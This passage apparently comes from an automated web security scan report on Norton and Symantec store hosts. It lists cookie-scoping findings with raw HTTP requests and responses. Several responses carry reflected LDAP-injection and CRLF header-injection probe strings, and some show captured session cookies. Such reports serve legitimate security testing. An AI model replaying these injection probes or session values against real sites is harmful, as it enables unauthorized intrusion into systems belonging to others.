HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:20 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 41047 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.13. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:17 GMT Pragma: no-cache Location: http://buy.norton.com/estore/mf/errorProductNotFound Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/ Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/ Content-Language: de-CH X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 299 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/er...[SNIP]...
9.14. http://mbox3.offermatica.com/m2/verisign/mbox/standard
Summary
Severity: Low
Confidence: Firm
Host: http://mbox3.offermatica.com
Path: /m2/verisign/mbox/standard
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 302 Moved Temporarily Server: Test & Target P3P: CP="NOI DSP CURa OUR STP COM" Date: Fri, 09 Sep 2011 21:25:51 GMT Location: http://mbox3.offermatica.com/m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31&mboxXDomainCheck=trueSet-Cookie: mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign Content-Length: 0
9.15. http://buy.norton.com/
Summary
Severity: Information
Confidence: Certain
Host: http://buy.norton.com
Path: /
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?trf_id=symcom&inid=us_hho_errorpage_to_store HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:16 GMT Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=f7d3c8fa-e003-4390-a682-049bba2b3c7d1315603876608 Set-Cookie: COUNTRY=US; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=en; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ Set-Cookie: TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ Set-Cookie: 
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 413 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/la...[SNIP]...
9.16. http://buy.norton.com/ps
Summary
Severity: Information
Confidence: Certain
Host: http://buy.norton.com
Path: /ps
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:23 GMT Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=18a29e71-5447-4147-9046-865f8a1fce521315604243554 Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: 
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 413 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/la...[SNIP]...
9.17. http://buy.norton.com/special-promotions
Summary
Severity: Information
Confidence: Certain
Host: http://buy.norton.com
Path: /special-promotions
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /special-promotions HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:25 GMT Location: http://buy.norton.com/estore/mf/landingPromotion?rdid=4d1e0611-4d59-4d29-9f22-ad1cbf72a98d1315604245447 Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: 
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 401 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/la...[SNIP]...
9.18. http://buy.norton.com/support
Summary
Severity: Information
Confidence: Certain
Host: http://buy.norton.com
Path: /support
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /support HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:21 GMT Location: http://www.norton.com/onlinehelp Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMTSet-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; 
expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 259 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://www.norton.com/onlinehelp">...[SNIP]...
9.19. http://buy.norton.com/upgrades-renewals
Summary
Severity: Information
Confidence: Certain
Host: http://buy.norton.com
Path: /upgrades-renewals
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:31:20; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /upgrades-renewals?ctry=US&lang=EN&trf_id=symcom&inid=us_hho_errorpage_to_store HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:18; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:20 GMT Location: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=5c55d1c3-a981-4fb5-9327-d629b62b51071315603880402 Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=en; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:18; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ Set-Cookie: LANGUAGE=EN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:20; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ Set-Cookie: TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ Set-Cookie: 
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 397 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/up...[SNIP]...
9.20. http://buy.symanteccloud.com/freetrial
Summary
Severity: Information
Confidence: Certain
Host: http://buy.symanteccloud.com
Path: /freetrial
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /freetrial HTTP/1.1 Host: buy.symanteccloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
